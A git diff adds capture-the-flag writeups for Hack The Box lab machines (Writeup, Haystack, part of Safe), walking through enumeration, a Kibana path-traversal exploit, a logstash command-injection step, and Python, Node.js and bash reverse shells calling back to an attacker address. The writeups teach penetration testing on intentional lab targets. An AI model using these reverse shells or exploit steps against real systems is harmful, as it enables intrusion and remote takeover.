+ jkr@writeup:~$ uname -a
+ Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
+ jkr@writeup:~$ cat /home/jkr/user.txt
+
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Part 3 : Getting Root Access**
+
+to escalate privileges to the root user, let's see what we can use to get a reverse shell onto the box
+
+
+ jkr@writeup:~$ which python
+ /usr/bin/python
+
+
+looks like we can use python to do so, let's ready our reverse shell in python
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → cat nihilist.py
+ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Writeup]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+
+
+_Terminal 3:_
+
+
+ jkr@writeup:~$ wget 10.10.14.10:8080/nihilist.py -O /usr/local/bin/run-parts
+ --2020-02-15 03:53:00-- http://10.10.14.10:8080/nihilist.py
+ Connecting to 10.10.14.10:8080... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 240 [text/plain]
+ Saving to: ‘/usr/local/bin/run-parts’
+
+ /usr/local/bin/run-parts 100%[===============================================>] 240 --.-KB/s in 0s
+
+ 2020-02-15 03:53:00 (52.9 MB/s) - ‘/usr/local/bin/run-parts’ saved [240/240]
+
+ jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
+
+
+
+Each time a user logs in, a process sets the PATH for that user and run-parts binary since we are part of the STAFF group, we can place our own run-parts binary in /usr/local/bin, cron will execute our own run-parts next time a new user logs in. And all that's left for us to do, is to log in another time as jkr, and it will activate our nihilist.py reverse shell and that way we will catch the incoming reverse shell connection through our second terminal.
+
+_Terminal 5:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → ssh jkr@10.10.10.138
+ jkr@10.10.10.138's password:
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Writeup]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.138] 57070
+ bash: cannot set terminal process group (2193): Inappropriate ioctl for device
+ bash: no job control in this shell
+ root@writeup:/# cat /root/root.txt
+ cat /root/root.txt
+
+ eeXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/34.md b/Easy/34.md
new file mode 100644
index 0000000..b6fb959
--- /dev/null
+++ b/Easy/34.md
@@ -0,0 +1,585 @@
+# Haystack Writeup
+
+
+
+## Haystack Introduction :
+
+Haystack is an easy Linux box that was released back in June 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nmap -F 10.10.10.115
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:05 GMT
+ Nmap scan report for 10.10.10.115
+ Host is up (0.81s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nmap -sCV -p22,80 10.10.10.115
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:06 GMT
+ Nmap scan report for 10.10.10.115
+ Host is up (0.11s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
+ | 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
+ |_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
+ 80/tcp open http nginx 1.12.2
+ |_http-server-header: nginx/1.12.2
+ |_http-title: Site doesn't have a title (text/html).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
+
+
+Let's add haystack.htb to our /etc/hosts file.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "10.10.10.115 haystack.htb" >> /etc/hosts
+
+
+## **Part 2 : Getting User Access**
+
+Let's see which directories we can find on the 80th port : using the dirsearch command.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, php, html, js | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-15_10-10-36.log
+
+ Target: http://10.10.10.115/
+
+ [10:10:37] Starting:
+ [10:10:39] 400 - 173B - /%2e%2e/google.com
+ [10:10:55] 200 - 55B - /index.md
+
+ Task Completed
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nikto -h http://haystack.htb/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.115
+ + Target Hostname: haystack.htb
+ + Target Port: 80
+ + Start Time: 2020-02-15 10:11:20 (GMT0)
+ ---------------------------------------------------------------------------
+ + Server: nginx/1.12.2
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)/
+
+
+
+Not much to see on that port from either dirsearch nor nikto, let's poke around the box a little further
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -sk http://haystack.htb/robots.txt | grep nginx
+ <****hr> <****center>nginx/1.12.2 <****/center>
+
+looks like we have nginx 1.12.2 running on this machine, just like how our nmap scan suggested. on index.html of port 80, we find a jpg file named needle, we download it locally and examine it with exiftool.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → wget http://haystack.htb/needle.jpg
+ --2020-02-15 10:18:22-- http://haystack.htb/needle.jpg
+ Resolving haystack.htb (haystack.htb)... 10.10.10.115
+ Connecting to haystack.htb (haystack.htb)|10.10.10.115|:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 182982 (179K) [image/jpeg]
+ Saving to: ‘needle.jpg’
+
+ needle.jpg 100%[===============================================>] 178.69K 155KB/s in 1.2s
+
+ 2020-02-15 10:18:24 (155 KB/s) - ‘needle.jpg’ saved [182982/182982]
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → exiftool needle.jpg
+ ExifTool Version Number : 11.86
+ File Name : needle.jpg
+ Directory : .
+ File Size : 179 kB
+ File Modification Date/Time : 2019:01:25 23:37:55+00:00
+ File Access Date/Time : 2020:02:15 10:18:49+00:00
+ File Inode Change Date/Time : 2020:02:15 10:18:24+00:00
+ File Permissions : rw-r--r--
+ File Type : JPEG
+ File Type Extension : jpg
+ MIME Type : image/jpeg
+ JFIF Version : 1.01
+ Exif Byte Order : Big-endian (Motorola, MM)
+ X Resolution : 96
+ Y Resolution : 96
+ Resolution Unit : inches
+ Software : paint.net 4.1.1
+ User Comment : CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90.
+ Image Width : 1200
+ Image Height : 803
+ Encoding Process : Baseline DCT, Huffman coding
+ Bits Per Sample : 8
+ Color Components : 3
+ Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
+ Image Size : 1200x803
+ Megapixels : 0.964
+
+
+
+not so many useful infos there, let's run the strings command aswell
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → strings needle.jpg
+
+ [...]
+ STW5
+ *Oo!;.o|?>
+ .n2FrZ
+ rrNMz
+ #=pMr
+ BN2I
+ ,'*'
+ I$f2/<****-iy
+ bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==
+
+looks like a base64 string right at the end, let's decrypt it using base64 -d
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
+ la aguja en el pajar es "clave"
+
+
+Translating it from spanish it says "the needle in the haystack is "key" "
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → nmap -F 10.10.10.115 --top-ports 10000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:14 GMT
+ Initiating Ping Scan at 10:14
+ Scanning 10.10.10.115 [4 ports]
+ Completed Ping Scan at 10:14, 0.14s elapsed (1 total hosts)
+ Initiating SYN Stealth Scan at 10:14
+ Scanning haystack.htb (10.10.10.115) [8320 ports]
+ Discovered open port 80/tcp on 10.10.10.115
+ Discovered open port 22/tcp on 10.10.10.115
+ Discovered open port 9200/tcp on 10.10.10.115
+ Completed SYN Stealth Scan at 10:15, 29.20s elapsed (8320 total ports)
+ Nmap scan report for haystack.htb (10.10.10.115)
+ Host is up, received echo-reply ttl 63 (0.11s latency).
+ Scanned at 2020-02-15 10:14:40 GMT for 30s
+ Not shown: 8317 filtered ports
+ Reason: 8283 no-responses and 34 host-prohibiteds
+ PORT STATE SERVICE REASON
+ 22/tcp open ssh syn-ack ttl 63
+ 80/tcp open http syn-ack ttl 63
+ 9200/tcp open wap-wsp syn-ack ttl 63
+
+ Read data files from: /usr/bin/../share/nmap
+ Nmap done: 1 IP address (1 host up) scanned in 29.50 seconds
+ Raw packets sent: 16621 (731.300KB) | Rcvd: 330 (73.816KB)
+
+
+looks like we have another port to work with, 9200 is running something, let's find out what it is with the -sCV flag.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → nmap -sCV -p9200 10.10.10.115
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 10:16 GMT
+ Nmap scan report for haystack.htb (10.10.10.115)
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 9200/tcp open http nginx 1.12.2
+ | http-methods:
+ |_ Potentially risky methods: DELETE
+ |_http-server-header: nginx/1.12.2
+ |_http-title: Site doesn't have a title (application/json; charset=UTF-8).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.14 seconds
+
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -sk http://haystack.htb:9200
+ {
+ "name" : "iQEYHgS",
+ "cluster_name" : "elasticsearch",
+ "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
+ "version" : {
+ "number" : "6.4.2",
+ "build_flavor" : "default",
+ "build_type" : "rpm",
+ "build_hash" : "04711c2",
+ "build_date" : "2018-09-26T13:34:09.098244Z",
+ "build_snapshot" : false,
+ "lucene_version" : "7.4.0",
+ "minimum_wire_compatibility_version" : "5.6.0",
+ "minimum_index_compatibility_version" : "5.0.0"
+ },
+ "tagline" : "You Know, for Search"
+ }
+
+
+looks like we have to deal with an [elasticsearch](https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html) service, running curl once more into the /_cat/indices?v URL we find some information in a cluster.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -sk http://haystack.htb:9200/_cat/indices/\?v
+
+ health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
+ green open .kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 1 0 4kb 4kb
+ yellow open quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb
+ yellow open bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb
+
+
+we see that indexes .kibana , quotes and bank are also opened, let's investigate them.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -X POST http://haystack.htb:9200/\/_search
+ {"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","resource.type":"index_or_alias","resource.id":"index","index_uuid":"_na_","index":"index"}],"type":"index_not_found_exception","reason":"no such index","resource.type":"index_or_alias","resource.id":"index","index_uuid":"_na_","index":"index"},"status":404}#
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → curl -X POST http://haystack.htb:9200/bank/_search
+ {"took":18,"timed_out":false,"_shards":{"total":5,"successful":5,"skipped":0,"failed":0},"hits":{"total":1000,"max_score":1.0,"hits":[{"_index":"bank","_type":"account","_id":"25","_score":1.0,"_source":{"account_number":25,"balance":40540,"firstname":"Virginia","lastname":"Ayala","age":39,"gender":"F","address":"171 Putnam Avenue","employer":"Filodyne","email":"virginiaayala@filodyne.com","city":"Nicholson","state":"PA"}},{"_index":"bank","_type":"account","_id":"44","_score":1.0,"_source":{"account_number":44,"balance":34487,"firstname":"Aurelia","lastname":"Harding","age":37,"gender":"M","address":"502 Baycliff Terrace","employer":"Orbalix","email":"aureliaharding@orbalix.com","city":"Yardville","state":"DE"}},{"_index":"bank","_type":"account","_id":"99","_score":1.0,"_source":{"account_number":99,"balance":47159,"firstname":"Ratliff","lastname":"Heath","age":39,"gender":"F","address":"806 Rockwell Place","employer":"Zappix","email":"ratliffheath@zappix.com","city":"Shaft","state":"ND"}},{"_index":"bank","_type":"account","_id":"119","_score":1.0,"_source":{"account_number":119,"balance":49222,"firstname":"Laverne","lastname":"Johnson","age":28,"gender":"F","address":"302 Howard Place","employer":"Senmei","email":"lavernejohnson@senmei.com","city":"Herlong","state":"DC"}},{"_index":"bank","_type":"account","_id":"126","_score":1.0,"_source":{"account_number":126,"balance":3607,"firstname":"Effie","lastname":"Gates","age":39,"gender":"F","address":"620 National Drive","employer":"Digitalus","email":"effiegates@digitalus.com","city":"Blodgett","state":"MD"}},{"_index":"bank","_type":"account","_id":"145","_score":1.0,"_source":{"account_number":145,"balance":47406,"firstname":"Rowena","lastname":"Wilkinson","age":32,"gender":"M","address":"891 Elton Street","employer":"Asimiline","email":"rowenawilkinson@asimiline.com","city":"Ripley","state":"NH"}},{"_index":"bank","_type":"account","_id":"183","_score":1.0,"_source":{"account_number":183,"balance":14223,"firstname":"Hudson","lastname":"English","age":26,"gender":"F","address":"823 Herkimer Place","employer":"Xinware","email":"hudsonenglish@xinware.com","city":"Robbins","state":"ND"}},{"_index":"bank","_type":"account","_id":"190","_score":1.0,"_source":{"account_number":190,"balance":3150,"firstname":"Blake","lastname":"Davidson","age":30,"gender":"F","address":"636 Diamond Street","employer":"Quantasis","email":"blakedavidson@quantasis.com","city":"Crumpler","state":"KY"}},{"_index":"bank","_type":"account","_id":"208","_score":1.0,"_source":{"account_number":208,"balance":40760,"firstname":"Garcia","lastname":"Hess","age":26,"gender":"F","address":"810 Nostrand Avenue","employer":"Quiltigen","email":"garciahess@quiltigen.com","city":"Brooktrails","state":"GA"}},{"_index":"bank","_type":"account","_id":"222","_score":1.0,"_source":{"account_number":222,"balance":14764,"firstname":"Rachelle","lastname":"Rice","age":36,"gender":"M","address":"333 Narrows Avenue","employer":"Enaut","email":"rachellerice@enaut.com","city":"Wright","state":"AZ"}}]}}
+
+
+as you can see, this dumps alot of json data, let's use a tool called [elasticdump](https://github.com/taskrabbit/elasticsearch-dump) instead.
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → npm install elasticdump -g
+ npm WARN deprecated request@2.88.2: request has been deprecated, see https://github.com/request/request/issues/3142
+ npm WARN deprecated s3signed@0.1.0: This module is no longer maintained. It is provided as is.
+ /usr/local/bin/elasticdump -> /usr/local/lib/node_modules/elasticdump/bin/elasticdump
+ /usr/local/bin/multielasticdump -> /usr/local/lib/node_modules/elasticdump/bin/multielasticdump
+ + elasticdump@6.21.0
+ added 103 packages from 146 contributors in 12.289s
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data
+ Sat, 15 Feb 2020 10:45:50 GMT | starting dump
+ Sat, 15 Feb 2020 10:45:51 GMT | got 100 objects from source elasticsearch (offset: 0)
+ Sat, 15 Feb 2020 10:45:51 GMT | sent 100 objects to destination file, wrote 100
+ Sat, 15 Feb 2020 10:45:52 GMT | got 100 objects from source elasticsearch (offset: 100)
+ Sat, 15 Feb 2020 10:45:52 GMT | sent 100 objects to destination file, wrote 100
+ Sat, 15 Feb 2020 10:45:52 GMT | got 53 objects from source elasticsearch (offset: 200)
+ Sat, 15 Feb 2020 10:45:52 GMT | sent 53 objects to destination file, wrote 53
+ Sat, 15 Feb 2020 10:45:52 GMT | got 0 objects from source elasticsearch (offset: 253)
+ Sat, 15 Feb 2020 10:45:52 GMT | Total Writes: 253
+ Sat, 15 Feb 2020 10:45:52 GMT | dump complete
+
+
+
+earlier on, needle.jpg yielded a hint for us, which was the word "clave" , let's grep for it
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → cat quotes.json| grep clave
+ {"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
+ {"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}
+
+
+looks like we have 2 base64 strings to decrypt, let's see what we get
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d
+ pass: spanish.is.key
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d
+ user: security
+
+
+looks like we have credentials ! security:spanish.is.key, let's try to log in via ssh
+
+
+ λ root [ 10.10.14.10/23 ] [nihilist/_HTB/Haystack]
+ → ssh security@haystack.htb
+ The authenticity of host 'haystack.htb (10.10.10.115)' can't be established.
+ ECDSA key fingerprint is SHA256:ihn2fPA4jrn1hytN0y9Z3vKpIKuL4YYe3yuESD76JeA.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'haystack.htb,10.10.10.115' (ECDSA) to the list of known hosts.
+ security@haystack.htb's password:
+ Last login: Wed Feb 6 20:53:59 2019 from 192.168.2.154
+ [security@haystack ~]$ uname -a
+ Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ [security@haystack ~]$ cat /home/security/user.txt
+ 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have the user flag :)
+
+## **Part 3 : Getting Root Access**
+
+In order to escalate privileges on the box, let's see if we can run the sudo -l command.
+
+
+ [security@haystack ~]$ sudo -l
+
+ We trust you have received the usual lecture from the local System
+ Administrator. It usually boils down to these three things:
+
+ #1) Respect the privacy of others.
+ #2) Think before you type.
+ #3) With great power comes great responsibility.
+
+ [sudo] password for security:
+ Sorry, user security may not run sudo on haystack.
+
+
+Out of luck, let's try printing out the contents of /etc/passwd
+
+
+ [security@haystack ~]$ cat /etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ adm:x:3:4:adm:/var/adm:/sbin/nologin
+ lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ sync:x:5:0:sync:/sbin:/bin/sync
+ shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ halt:x:7:0:halt:/sbin:/sbin/halt
+ mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ operator:x:11:0:operator:/root:/sbin/nologin
+ games:x:12:100:games:/usr/games:/sbin/nologin
+ ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ nobody:x:99:99:Nobody:/:/sbin/nologin
+ systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+ dbus:x:81:81:System message bus:/:/sbin/nologin
+ polkitd:x:999:998:User for polkitd:/:/sbin/nologin
+ sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+ postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+ chrony:x:998:996::/var/lib/chrony:/sbin/nologin
+ security:x:1000:1000:security:/home/security:/bin/bash
+ elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
+ logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
+ nginx:x:995:993:Nginx web server:/var/lib/nginx:/sbin/nologin
+ kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin
+
+
+let's check if there are any processes running for the user kibana using ps aux
+
+
+ [security@haystack ~]$ ps aux | grep kibana
+ kibana 6359 1.2 5.2 1344552 203872 ? Ssl 06:05 0:36 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml
+ security 17023 0.0 0.0 112708 972 pts/0 R+ 06:56 0:00 grep --color=auto kibana
+
+
+kibana has a config file stored in /etc/kibana/kibana.yml , let's try to read it's contents
+
+
+ [security@haystack ~]$ cat /etc/kibana/kibana.yml | grep port
+ # Kibana is served by a back end server. This setting specifies the port to use.
+ server.port: 5601
+
+
+Looks like there is an opened port on localhost (127.0.0.1) that is being used, haystack.htb:9200 revealed us earlier that it was running as version 6.4.2 which indicates an outdated service, with certain vulnerabilities for us to [exploit](https://github.com/mpgn/CVE-2018-17246)
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nano nihilist.js
+
+
+
+ (function(){
+ var net = require("net"),
+ cp = require("child_process"),
+ sh = cp.spawn("/bin/sh", []);
+ var client = new net.Socket();
+ client.connect(9001, "10.10.14.10", function(){
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ });
+ return /a/; // Prevents the Node.js application form crashing
+ })();
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+_Terminal 2:_
+
+
+ [security@haystack]$ cd /tmp && curl http://10.10.14.10:8080/nihilist.js > nihilist.js
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 382 100 382 0 0 1916 0 --:--:-- --:--:-- --:--:-- 1929
+ [security@haystack tmp]$ ls
+ nihilist.js
+ hsperfdata_root
+ jruby-6366
+ systemd-private-a242aff03786477b8fe05cbbaae15c33-chronyd.service-bOL8g5
+ systemd-private-a242aff03786477b8fe05cbbaae15c33-elasticsearch.service-DDSUOI
+ systemd-private-a242aff03786477b8fe05cbbaae15c33-nginx.service-Vji3Rm
+ vmware-root
+ vmware-root_6751-3887503186
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → cat nihilist.js
+ (function(){
+ var net = require("net"),
+ cp = require("child_process"),
+ sh = cp.spawn("/bin/sh", []);
+ var client = new net.Socket();
+ client.connect(9001, "10.10.14.10", function(){
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ });
+ return /a/; // Prevents the Node.js application form crashing
+ })();
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+_Terminal 2:_
+
+
+ [security@haystack tmp]$ curl 127.0.0.1:5601/api/console/api_server?apis=../../../../../../../tmp/nihilist.js
+
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.115] 55450
+ uname -a
+ Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ cat /root/root.txt
+ cat: /root/root.txt: Permiso denegado
+
+
+it connected back ! but we still need to escalate privileges... let's check out /etc/logstash/conf.d/
+
+
+ bash-4.2$ pwd
+ pwd
+ /
+ bash-4.2$ cd /etc/logstash/conf.d
+ cd /etc/logstash/conf.d
+ bash-4.2$ ls -lash
+ ls -lash
+ total 12K
+ 0 drwxrwxr-x. 2 root kibana 62 jun 24 2019 .
+ 0 drwxr-xr-x. 3 root root 183 jun 18 2019 ..
+ 4,0K -rw-r-----. 1 root kibana 131 jun 20 2019 filter.conf
+ 4,0K -rw-r-----. 1 root kibana 186 jun 24 2019 input.conf
+ 4,0K -rw-r-----. 1 root kibana 109 jun 24 2019 output.conf
+
+
+here we see a few config files, let's see what their contents are.
+
+
+ bash-4.2$ cat input.conf
+ cat input.conf
+ input {
+ file {
+ path => "/opt/kibana/logstash_*"
+ start_position => "beginning"
+ sincedb_path => "/dev/null"
+ stat_interval => "10 second"
+ type => "execute"
+ mode => "read"
+ }
+ }
+ bash-4.2$ cat output.conf
+ cat output.conf
+ output {
+ if [type] == "execute" {
+ stdout { codec => json }
+ exec {
+ command => "%{comando} &"
+ }
+ }
+ }
+ bash-4.2$ cat filter.conf
+ cat filter.conf
+ filter {
+ if [type] == "execute" {
+ grok {
+ match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
+ }
+ }
+ }
+
+
+looking at the config files it means that we can have code execution from the /opt/kibana directory if we create a reverse shell script named logstash_a, so let's do it :
+
+
+ bash-4.2$ cd /opt/kibana
+ cd /opt/kibana
+ bash-4.2$ echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.14.10/9002 0>&1' > logstash_a
+ echo 'bash -i >& /dev/tcp/10.10.14.10/9002 0>&1' > logstash_a
+ bash-4.2$ cat logstash_a
+ cat logstash_a
+ bash -i >& /dev/tcp/10.10.14.10/9002 0>&1
+ bash-4.2$ chmod +x logstash_a
+ chmod +x logstash_a
+ bash-4.2$ ls -lash
+ ls -lash
+ total 4,0K
+ 0 drwxr-x---. 2 kibana kibana 24 feb 15 10:43 .
+ 0 drwxr-xr-x. 3 root root 20 jun 18 2019 ..
+ 4,0K -rwxr-xr-x. 1 kibana kibana 61 feb 15 10:43 logstash_a
+
+
+Waiting a bit more than the announced 10s in the config files earlier, for the connection to come back to us, but on the 9002nd port, with another netcat command ready to catch it
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Haystack]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ ls
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.115] 57954
+ bash: no hay control de trabajos en este shell
+ [root@haystack /]#
+ [root@haystack /]# cat /root/root.txt
+ cat /root/root.txt
+ 3fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and that's it ! we have been able to escalate privileges and printing out the root flag of the box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/35.md b/Easy/35.md
new file mode 100644
index 0000000..f03c1a1
--- /dev/null
+++ b/Easy/35.md
@@ -0,0 +1,883 @@
+# Safe Writeup
+
+
+
+## Introduction :
+
+Safe is an easy Linux box that was released back in July 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → nmap -F 10.10.10.147 --top-ports 10000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 16:08 GMT
+ Initiating Ping Scan at 16:08
+ Scanning 10.10.10.147 [2 ports]
+ Completed Ping Scan at 16:08, 0.09s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 16:08
+ Completed Parallel DNS resolution of 1 host. at 16:08, 0.01s elapsed
+ DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 16:08
+ Scanning 10.10.10.147 [8320 ports]
+ Discovered open port 22/tcp on 10.10.10.147
+ Discovered open port 80/tcp on 10.10.10.147
+ Increasing send delay for 10.10.10.147 from 0 to 5 due to 57 out of 189 dropped probes since last increase.
+ Connect Scan Timing: About 24.46% done; ETC: 16:10 (0:01:36 remaining)
+ Connect Scan Timing: About 48.59% done; ETC: 16:10 (0:01:05 remaining)
+ Increasing send delay for 10.10.10.147 from 5 to 10 due to max_successful_tryno increase to 4
+ Discovered open port 1337/tcp on 10.10.10.147
+ Connect Scan Timing: About 70.69% done; ETC: 16:10 (0:00:38 remaining)
